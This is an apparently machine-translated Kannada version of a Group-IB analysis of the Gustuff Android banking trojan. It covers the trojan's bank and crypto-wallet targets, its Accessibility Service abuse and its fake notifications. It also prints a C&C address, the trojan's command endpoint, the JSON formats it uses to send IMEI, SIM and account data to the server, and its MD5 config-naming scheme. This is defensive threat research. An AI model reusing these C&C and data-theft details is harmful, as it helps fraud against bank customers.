ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ

ಇನ್ನೊಂದು ದಿನ ಗ್ರೂಪ್-ಐಬಿ ಮಾಹಿತಿ ನೀಡಿದರು ಮೊಬೈಲ್ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್‌ನ ಚಟುವಟಿಕೆಯ ಬಗ್ಗೆ. ಇದು ಅಂತರರಾಷ್ಟ್ರೀಯ ಮಾರುಕಟ್ಟೆಗಳಲ್ಲಿ ಪ್ರತ್ಯೇಕವಾಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ, 100 ದೊಡ್ಡ ವಿದೇಶಿ ಬ್ಯಾಂಕ್‌ಗಳ ಕ್ಲೈಂಟ್‌ಗಳು, ಮೊಬೈಲ್ 32 ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್‌ಗಳ ಬಳಕೆದಾರರು ಮತ್ತು ದೊಡ್ಡ ಇ-ಕಾಮರ್ಸ್ ಸಂಪನ್ಮೂಲಗಳ ಮೇಲೆ ದಾಳಿ ಮಾಡುತ್ತದೆ. ಆದರೆ ಗಸ್ಟಫ್‌ನ ಡೆವಲಪರ್ ಬೆಸ್ಟ್‌ಆಫರ್ ಎಂಬ ಅಡ್ಡಹೆಸರಿನಡಿಯಲ್ಲಿ ರಷ್ಯನ್ ಮಾತನಾಡುವ ಸೈಬರ್ ಕ್ರಿಮಿನಲ್ ಆಗಿದ್ದಾರೆ. ಇತ್ತೀಚಿನವರೆಗೂ, ಅವರು ತಮ್ಮ ಟ್ರೋಜನ್ ಅನ್ನು "ಜ್ಞಾನ ಮತ್ತು ಅನುಭವ ಹೊಂದಿರುವ ಜನರಿಗೆ ಗಂಭೀರ ಉತ್ಪನ್ನ" ಎಂದು ಹೊಗಳಿದರು.

ಗುಂಪು-IB ನಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ವಿಶ್ಲೇಷಣೆ ತಜ್ಞರು ಇವಾನ್ ಪಿಸರೆವ್ ಅವರ ಸಂಶೋಧನೆಯಲ್ಲಿ, ಅವರು ಗಸ್ಟಫ್ ಹೇಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಮತ್ತು ಅದರ ಅಪಾಯಗಳ ಬಗ್ಗೆ ವಿವರವಾಗಿ ಮಾತನಾಡುತ್ತಾರೆ.

ಗಸ್ಟಫ್ ಯಾರಿಗಾಗಿ ಬೇಟೆಯಾಡುತ್ತಿದೆ?

ಗಸ್ಟಫ್ ಸಂಪೂರ್ಣ ಸ್ವಯಂಚಾಲಿತ ಕಾರ್ಯಗಳನ್ನು ಹೊಂದಿರುವ ಹೊಸ ಪೀಳಿಗೆಯ ಮಾಲ್‌ವೇರ್‌ಗೆ ಸೇರಿದೆ. ಡೆವಲಪರ್ ಪ್ರಕಾರ, ಟ್ರೋಜನ್ ಆಂಡಿಬಾಟ್ ಮಾಲ್‌ವೇರ್‌ನ ಹೊಸ ಮತ್ತು ಸುಧಾರಿತ ಆವೃತ್ತಿಯಾಗಿದೆ, ಇದು ನವೆಂಬರ್ 2017 ರಿಂದ ಆಂಡ್ರಾಯ್ಡ್ ಫೋನ್‌ಗಳ ಮೇಲೆ ದಾಳಿ ಮಾಡುತ್ತಿದೆ ಮತ್ತು ಫಿಶಿಂಗ್ ವೆಬ್ ಫಾರ್ಮ್‌ಗಳ ಮೂಲಕ ಪ್ರಸಿದ್ಧ ಅಂತರರಾಷ್ಟ್ರೀಯ ಬ್ಯಾಂಕ್‌ಗಳು ಮತ್ತು ಪಾವತಿ ವ್ಯವಸ್ಥೆಗಳ ಮೊಬೈಲ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಮೂಲಕ ಹಣವನ್ನು ಕದಿಯುತ್ತಿದೆ. ಗಸ್ಟಫ್ ಬಾಟ್ ಬಾಡಿಗೆ ಬೆಲೆ ತಿಂಗಳಿಗೆ $800 ಎಂದು Bestoffer ವರದಿ ಮಾಡಿದೆ.

ಗಸ್ಟಫ್ ಮಾದರಿಯ ವಿಶ್ಲೇಷಣೆಯು ಬ್ಯಾಂಕ್ ಆಫ್ ಅಮೇರಿಕಾ, ಬ್ಯಾಂಕ್ ಆಫ್ ಸ್ಕಾಟ್ಲೆಂಡ್, ಜೆಪಿ ಮೋರ್ಗಾನ್, ವೆಲ್ಸ್ ಫಾರ್ಗೋ, ಕ್ಯಾಪಿಟಲ್ ಒನ್, ಟಿಡಿ ಬ್ಯಾಂಕ್, ಪಿಎನ್‌ಸಿ ಬ್ಯಾಂಕ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್‌ಗಳಂತಹ ದೊಡ್ಡ ಬ್ಯಾಂಕ್‌ಗಳ ಮೊಬೈಲ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ಬಳಸಿಕೊಂಡು ಟ್ರೋಜನ್ ಗ್ರಾಹಕರನ್ನು ಸಂಭಾವ್ಯವಾಗಿ ಗುರಿಯಾಗಿಸಿಕೊಂಡಿದೆ ಎಂದು ತೋರಿಸಿದೆ. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, ಇತ್ಯಾದಿ.

ಮೂಲತಃ ಕ್ಲಾಸಿಕ್ ಬ್ಯಾಂಕಿಂಗ್ ಟ್ರೋಜನ್ ಆಗಿ ರಚಿಸಲಾಗಿದೆ, ಅದರ ಪ್ರಸ್ತುತ ಆವೃತ್ತಿಯಲ್ಲಿ ಗುಸ್ಟಫ್ ದಾಳಿಯ ಸಂಭಾವ್ಯ ಗುರಿಗಳ ಪಟ್ಟಿಯನ್ನು ಗಮನಾರ್ಹವಾಗಿ ವಿಸ್ತರಿಸಿದೆ. ಬ್ಯಾಂಕ್‌ಗಳು, ಫಿನ್‌ಟೆಕ್ ಕಂಪನಿಗಳು ಮತ್ತು ಕ್ರಿಪ್ಟೋ ಸೇವೆಗಳಿಗೆ Android ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಜೊತೆಗೆ, Gustuff ಮಾರುಕಟ್ಟೆ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು, ಆನ್‌ಲೈನ್ ಸ್ಟೋರ್‌ಗಳು, ಪಾವತಿ ವ್ಯವಸ್ಥೆಗಳು ಮತ್ತು ತ್ವರಿತ ಸಂದೇಶವಾಹಕಗಳ ಬಳಕೆದಾರರನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿದೆ. ನಿರ್ದಿಷ್ಟವಾಗಿ, ಪೇಪಾಲ್, ವೆಸ್ಟರ್ನ್ ಯೂನಿಯನ್, ಇಬೇ, ವಾಲ್‌ಮಾರ್ಟ್, ಸ್ಕೈಪ್, ವಾಟ್ಸಾಪ್, ಗೆಟ್ ಟ್ಯಾಕ್ಸಿ, ರಿವೊಲಟ್ ಮತ್ತು ಇತರರು.

ಪ್ರವೇಶ ಬಿಂದು: ಸಾಮೂಹಿಕ ಸೋಂಕಿನ ಲೆಕ್ಕಾಚಾರ

APK ಗಳಿಗೆ ಲಿಂಕ್‌ಗಳೊಂದಿಗೆ SMS ಮೇಲಿಂಗ್‌ಗಳ ಮೂಲಕ Android ಸ್ಮಾರ್ಟ್‌ಫೋನ್‌ಗಳಿಗೆ ನುಗ್ಗುವ "ಕ್ಲಾಸಿಕ್" ವೆಕ್ಟರ್‌ನಿಂದ ಗಸ್ಟಫ್ ಅನ್ನು ನಿರೂಪಿಸಲಾಗಿದೆ. ಸರ್ವರ್‌ನ ಆಜ್ಞೆಯ ಮೇರೆಗೆ Android ಸಾಧನವು ಟ್ರೋಜನ್‌ನಿಂದ ಸೋಂಕಿಗೆ ಒಳಗಾದಾಗ, ಸೋಂಕಿತ ಫೋನ್‌ನ ಸಂಪರ್ಕ ಡೇಟಾಬೇಸ್ ಮೂಲಕ ಅಥವಾ ಸರ್ವರ್ ಡೇಟಾಬೇಸ್ ಮೂಲಕ Gustuff ಮತ್ತಷ್ಟು ಹರಡಬಹುದು. ಗಸ್ಟಫ್‌ನ ಕಾರ್ಯವನ್ನು ಸಾಮೂಹಿಕ ಸೋಂಕು ಮತ್ತು ಅದರ ನಿರ್ವಾಹಕರ ವ್ಯವಹಾರದ ಗರಿಷ್ಠ ಬಂಡವಾಳೀಕರಣಕ್ಕಾಗಿ ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ - ಇದು ಕಾನೂನುಬದ್ಧ ಮೊಬೈಲ್ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು ಮತ್ತು ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್‌ಗಳಲ್ಲಿ ವಿಶಿಷ್ಟವಾದ “ಸ್ವಯಂ-ಭರ್ತಿ” ಕಾರ್ಯವನ್ನು ಹೊಂದಿದೆ, ಇದು ಹಣದ ಕಳ್ಳತನವನ್ನು ವೇಗಗೊಳಿಸಲು ಮತ್ತು ಅಳೆಯಲು ನಿಮಗೆ ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ.

ಟ್ರೋಜನ್‌ನ ಅಧ್ಯಯನವು ಅಂಗವೈಕಲ್ಯ ಹೊಂದಿರುವ ಜನರಿಗೆ ಸೇವೆಯಾದ ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸ್ವಯಂತುಂಬುವಿಕೆಯ ಕಾರ್ಯವನ್ನು ಅಳವಡಿಸಲಾಗಿದೆ ಎಂದು ತೋರಿಸಿದೆ. ಈ Android ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ವಿಂಡೋ ಅಂಶಗಳೊಂದಿಗೆ ಸಂವಹನದ ವಿರುದ್ಧ ರಕ್ಷಣೆಯನ್ನು ಯಶಸ್ವಿಯಾಗಿ ಬೈಪಾಸ್ ಮಾಡುವ ಮೊದಲ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ಅಲ್ಲ. ಆದಾಗ್ಯೂ, ಕಾರ್ ಫಿಲ್ಲರ್‌ನೊಂದಿಗೆ ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯ ಬಳಕೆಯು ಇನ್ನೂ ಅಪರೂಪವಾಗಿದೆ.

ಬಲಿಪಶುವಿನ ಫೋನ್‌ಗೆ ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ನಂತರ, ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಗಸ್ಟಫ್, ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ವಿಂಡೋ ಅಂಶಗಳೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ (ಬ್ಯಾಂಕಿಂಗ್, ಕ್ರಿಪ್ಟೋಕರೆನ್ಸಿ, ಹಾಗೆಯೇ ಆನ್‌ಲೈನ್ ಶಾಪಿಂಗ್, ಸಂದೇಶ ಕಳುಹಿಸುವಿಕೆ, ಇತ್ಯಾದಿ.), ಆಕ್ರಮಣಕಾರರಿಗೆ ಅಗತ್ಯವಾದ ಕ್ರಮಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ. . ಉದಾಹರಣೆಗೆ, ಸರ್ವರ್‌ನ ಆಜ್ಞೆಯಲ್ಲಿ, ಟ್ರೋಜನ್ ಬಟನ್‌ಗಳನ್ನು ಒತ್ತಬಹುದು ಮತ್ತು ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳಲ್ಲಿ ಪಠ್ಯ ಕ್ಷೇತ್ರಗಳ ಮೌಲ್ಯಗಳನ್ನು ಬದಲಾಯಿಸಬಹುದು. ಆಕ್ಸೆಸಿಬಿಲಿಟಿ ಸರ್ವೀಸ್ ಮೆಕ್ಯಾನಿಸಂ ಅನ್ನು ಬಳಸುವುದರಿಂದ ಟ್ರೋಜನ್ ಹಿಂದಿನ ತಲೆಮಾರಿನ ಮೊಬೈಲ್ ಟ್ರೋಜನ್‌ಗಳನ್ನು ಎದುರಿಸಲು ಬ್ಯಾಂಕ್‌ಗಳು ಬಳಸುವ ಭದ್ರತಾ ಕಾರ್ಯವಿಧಾನಗಳನ್ನು ಬೈಪಾಸ್ ಮಾಡಲು ಅನುಮತಿಸುತ್ತದೆ, ಹಾಗೆಯೇ Android OS ನ ಹೊಸ ಆವೃತ್ತಿಗಳಲ್ಲಿ Google ನಿಂದ ಜಾರಿಗೊಳಿಸಲಾದ ಭದ್ರತಾ ನೀತಿಯಲ್ಲಿನ ಬದಲಾವಣೆಗಳು. ಹೀಗಾಗಿ, ಗೂಗಲ್ ಪ್ರೊಟೆಕ್ಟ್ ರಕ್ಷಣೆಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಲು ಗುಸ್ಟಫ್ "ಹೇಗೆ ತಿಳಿದಿದೆ": ಲೇಖಕರ ಪ್ರಕಾರ, ಈ ಕಾರ್ಯವು 70% ಪ್ರಕರಣಗಳಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ.

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ

ಗಸ್ಟಫ್ ಕಾನೂನುಬದ್ಧ ಮೊಬೈಲ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ಐಕಾನ್‌ಗಳೊಂದಿಗೆ ನಕಲಿ ಪುಶ್ ಅಧಿಸೂಚನೆಗಳನ್ನು ಸಹ ಪ್ರದರ್ಶಿಸಬಹುದು. ಬಳಕೆದಾರರು ಪುಶ್ ಅಧಿಸೂಚನೆಯ ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡುತ್ತಾರೆ ಮತ್ತು ಸರ್ವರ್‌ನಿಂದ ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾದ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ನೋಡುತ್ತಾರೆ, ಅಲ್ಲಿ ಅವರು ವಿನಂತಿಸಿದ ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್ ಅಥವಾ ಕ್ರಿಪ್ಟೋ ವ್ಯಾಲೆಟ್ ಡೇಟಾವನ್ನು ನಮೂದಿಸುತ್ತಾರೆ. ಮತ್ತೊಂದು ಗಸ್ಟಫ್ ಸನ್ನಿವೇಶದಲ್ಲಿ, ಪುಶ್ ಅಧಿಸೂಚನೆಯನ್ನು ಪ್ರದರ್ಶಿಸಲಾದ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯಲಾಗುತ್ತದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಮಾಲ್‌ವೇರ್, ಪ್ರವೇಶ ಸೇವೆಯ ಮೂಲಕ ಸರ್ವರ್‌ನಿಂದ ಆದೇಶದ ಮೇರೆಗೆ, ಮೋಸದ ವಹಿವಾಟಿಗಾಗಿ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ನ ಫಾರ್ಮ್ ಕ್ಷೇತ್ರಗಳನ್ನು ಭರ್ತಿ ಮಾಡಬಹುದು.

Gustuff ನ ಕಾರ್ಯವು ಸರ್ವರ್‌ಗೆ ಸೋಂಕಿತ ಸಾಧನದ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಕಳುಹಿಸುವುದು, SMS ಸಂದೇಶಗಳನ್ನು ಓದುವ/ಕಳುಹಿಸುವ ಸಾಮರ್ಥ್ಯ, USSD ವಿನಂತಿಗಳನ್ನು ಕಳುಹಿಸುವುದು, SOCKS5 ಪ್ರಾಕ್ಸಿಯನ್ನು ಪ್ರಾರಂಭಿಸುವುದು, ಲಿಂಕ್ ಅನ್ನು ಅನುಸರಿಸುವುದು, ಫೈಲ್‌ಗಳನ್ನು ಕಳುಹಿಸುವುದು (ಡಾಕ್ಯುಮೆಂಟ್‌ಗಳ ಫೋಟೋ ಸ್ಕ್ಯಾನ್‌ಗಳು, ಸ್ಕ್ರೀನ್‌ಶಾಟ್‌ಗಳು, ಛಾಯಾಚಿತ್ರಗಳು ಸೇರಿದಂತೆ) ಸರ್ವರ್ , ಸಾಧನವನ್ನು ಫ್ಯಾಕ್ಟರಿ ಸೆಟ್ಟಿಂಗ್‌ಗಳಿಗೆ ಮರುಹೊಂದಿಸಿ.

ಮಾಲ್ವೇರ್ ವಿಶ್ಲೇಷಣೆ

ದುರುದ್ದೇಶಪೂರಿತ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವ ಮೊದಲು, Android OS ಬಳಕೆದಾರರಿಗೆ Gustuff ವಿನಂತಿಸಿದ ಹಕ್ಕುಗಳ ಪಟ್ಟಿಯನ್ನು ಹೊಂದಿರುವ ವಿಂಡೋವನ್ನು ತೋರಿಸುತ್ತದೆ:

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ
ಬಳಕೆದಾರರ ಒಪ್ಪಿಗೆಯನ್ನು ಪಡೆದ ನಂತರವೇ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸಲಾಗುತ್ತದೆ. ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಿದ ನಂತರ, ಟ್ರೋಜನ್ ಬಳಕೆದಾರರಿಗೆ ವಿಂಡೋವನ್ನು ತೋರಿಸುತ್ತದೆ:

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ
ಅದರ ನಂತರ ಅದು ತನ್ನ ಐಕಾನ್ ಅನ್ನು ತೆಗೆದುಹಾಕುತ್ತದೆ.

ಎಫ್‌ಟಿಟಿಯಿಂದ ಪ್ಯಾಕರ್‌ನಿಂದ ಲೇಖಕರ ಪ್ರಕಾರ ಗಸ್ಟಫ್ ಅನ್ನು ಪ್ಯಾಕ್ ಮಾಡಲಾಗಿದೆ. ಪ್ರಾರಂಭದ ನಂತರ, ಆದೇಶಗಳನ್ನು ಸ್ವೀಕರಿಸಲು ಅಪ್ಲಿಕೇಶನ್ ನಿಯತಕಾಲಿಕವಾಗಿ CnC ಸರ್ವರ್ ಅನ್ನು ಸಂಪರ್ಕಿಸುತ್ತದೆ. ನಾವು ಪರಿಶೀಲಿಸಿದ ಹಲವಾರು ಫೈಲ್‌ಗಳು IP ವಿಳಾಸವನ್ನು ನಿಯಂತ್ರಣ ಸರ್ವರ್ ಆಗಿ ಬಳಸಿದೆ 88.99.171[.]105 (ಇನ್ನು ಮುಂದೆ ನಾವು ಅದನ್ನು ಹೀಗೆ ಸೂಚಿಸುತ್ತೇವೆ <%CnC%>).

ಪ್ರಾರಂಭದ ನಂತರ, ಪ್ರೋಗ್ರಾಂ ಸರ್ವರ್‌ಗೆ ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸಲು ಪ್ರಾರಂಭಿಸುತ್ತದೆ http://<%CnC%>/api/v1/get.php.

ಪ್ರತಿಕ್ರಿಯೆಯು ಈ ಕೆಳಗಿನ ಸ್ವರೂಪದಲ್ಲಿ JSON ಆಗಿರುತ್ತದೆ ಎಂದು ನಿರೀಕ್ಷಿಸಲಾಗಿದೆ:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

ಪ್ರತಿ ಬಾರಿ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಪ್ರವೇಶಿಸಿದಾಗ, ಅದು ಸೋಂಕಿತ ಸಾಧನದ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಕಳುಹಿಸುತ್ತದೆ. ಸಂದೇಶದ ಸ್ವರೂಪವನ್ನು ಕೆಳಗೆ ತೋರಿಸಲಾಗಿದೆ. ಜಾಗ ಎಂದು ಗಮನಿಸಬೇಕಾದ ಅಂಶವಾಗಿದೆ ಪೂರ್ಣ, ಹೆಚ್ಚುವರಿ, ಅಪ್ಲಿಕೇಶನ್ಗಳು и ಅನುಮತಿ - ಐಚ್ಛಿಕ ಮತ್ತು CnC ಯಿಂದ ವಿನಂತಿಯ ಆಜ್ಞೆಯ ಸಂದರ್ಭದಲ್ಲಿ ಮಾತ್ರ ಕಳುಹಿಸಲಾಗುತ್ತದೆ.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

ಸಂರಚನಾ ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸಲಾಗುತ್ತಿದೆ

ಗಸ್ಟಫ್ ಕಾರ್ಯಾಚರಣೆಯ ಪ್ರಮುಖ ಮಾಹಿತಿಯನ್ನು ಆದ್ಯತೆಯ ಫೈಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸುತ್ತದೆ. ಫೈಲ್ ಹೆಸರು, ಹಾಗೆಯೇ ಅದರಲ್ಲಿರುವ ಪ್ಯಾರಾಮೀಟರ್‌ಗಳ ಹೆಸರುಗಳು ಸ್ಟ್ರಿಂಗ್‌ನಿಂದ MD5 ಮೊತ್ತವನ್ನು ಲೆಕ್ಕಾಚಾರ ಮಾಡುವ ಫಲಿತಾಂಶವಾಗಿದೆ 15413090667214.6.1<%name%>ಅಲ್ಲಿ <%name%> - ಆರಂಭಿಕ ಹೆಸರು-ಮೌಲ್ಯ. ಹೆಸರು ಪೀಳಿಗೆಯ ಕಾರ್ಯದ ಪೈಥಾನ್ ವ್ಯಾಖ್ಯಾನ:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input) 

ಕೆಳಗಿನವುಗಳಲ್ಲಿ ನಾವು ಅದನ್ನು ಸೂಚಿಸುತ್ತೇವೆ ನೇಮ್ ಜನರೇಟರ್ (ಇನ್ಪುಟ್).
ಆದ್ದರಿಂದ ಮೊದಲ ಫೈಲ್ ಹೆಸರು: ನೇಮ್ ಜನರೇಟರ್("API_SERVER_LIST"), ಇದು ಈ ಕೆಳಗಿನ ಹೆಸರುಗಳೊಂದಿಗೆ ಮೌಲ್ಯಗಳನ್ನು ಒಳಗೊಂಡಿದೆ:

ವೇರಿಯಬಲ್ ಹೆಸರು ಮೌಲ್ಯವನ್ನು
ನೇಮ್ ಜನರೇಟರ್("API_SERVER_LIST") ರಚನೆಯ ರೂಪದಲ್ಲಿ CnC ವಿಳಾಸಗಳ ಪಟ್ಟಿಯನ್ನು ಒಳಗೊಂಡಿದೆ.
ನೇಮ್ ಜನರೇಟರ್("API_SERVER_URL") CnC ವಿಳಾಸವನ್ನು ಒಳಗೊಂಡಿದೆ.
ನೇಮ್ ಜನರೇಟರ್("SMS_UPLOAD") ಧ್ವಜವನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ಹೊಂದಿಸಲಾಗಿದೆ. ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸಿದರೆ, CnC ಗೆ SMS ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸುತ್ತದೆ.
ನೇಮ್ ಜನರೇಟರ್("SMS_ROOT_NUMBER") ಸೋಂಕಿತ ಸಾಧನದಿಂದ ಸ್ವೀಕರಿಸಲಾದ SMS ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸುವ ಫೋನ್ ಸಂಖ್ಯೆ. ಡೀಫಾಲ್ಟ್ ಶೂನ್ಯವಾಗಿದೆ.
ನೇಮ್ ಜನರೇಟರ್("SMS_ROOT_NUMBER_RESEND") ಧ್ವಜವನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ತೆರವುಗೊಳಿಸಲಾಗಿದೆ. ಸ್ಥಾಪಿಸಿದರೆ, ಸೋಂಕಿತ ಸಾಧನವು SMS ಅನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ, ಅದನ್ನು ಮೂಲ ಸಂಖ್ಯೆಗೆ ಕಳುಹಿಸಲಾಗುತ್ತದೆ.
ನೇಮ್ ಜನರೇಟರ್("DEFAULT_APP_SMS") ಧ್ವಜವನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ತೆರವುಗೊಳಿಸಲಾಗಿದೆ. ಈ ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸಿದರೆ, ಅಪ್ಲಿಕೇಶನ್ ಒಳಬರುವ SMS ಸಂದೇಶಗಳನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತದೆ.
ನೇಮ್ ಜನರೇಟರ್("DEFAULT_ADMIN") ಧ್ವಜವನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ತೆರವುಗೊಳಿಸಲಾಗಿದೆ. ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸಿದರೆ, ಅಪ್ಲಿಕೇಶನ್ ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳನ್ನು ಹೊಂದಿರುತ್ತದೆ.
ನೇಮ್ ಜನರೇಟರ್("DEFAULT_ACCESSIBILITY") ಧ್ವಜವನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ ತೆರವುಗೊಳಿಸಲಾಗಿದೆ. ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸಿದರೆ, ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಬಳಸುವ ಸೇವೆಯು ಚಾಲನೆಯಲ್ಲಿದೆ.
ನೇಮ್ ಜನರೇಟರ್("APPS_CONFIG") ನಿರ್ದಿಷ್ಟ ಅಪ್ಲಿಕೇಶನ್‌ಗೆ ಸಂಬಂಧಿಸಿದ ಪ್ರವೇಶಿಸುವಿಕೆ ಈವೆಂಟ್ ಅನ್ನು ಪ್ರಚೋದಿಸಿದಾಗ ನಿರ್ವಹಿಸಬೇಕಾದ ಕ್ರಿಯೆಗಳ ಪಟ್ಟಿಯನ್ನು ಒಳಗೊಂಡಿರುವ JSON ಆಬ್ಜೆಕ್ಟ್.
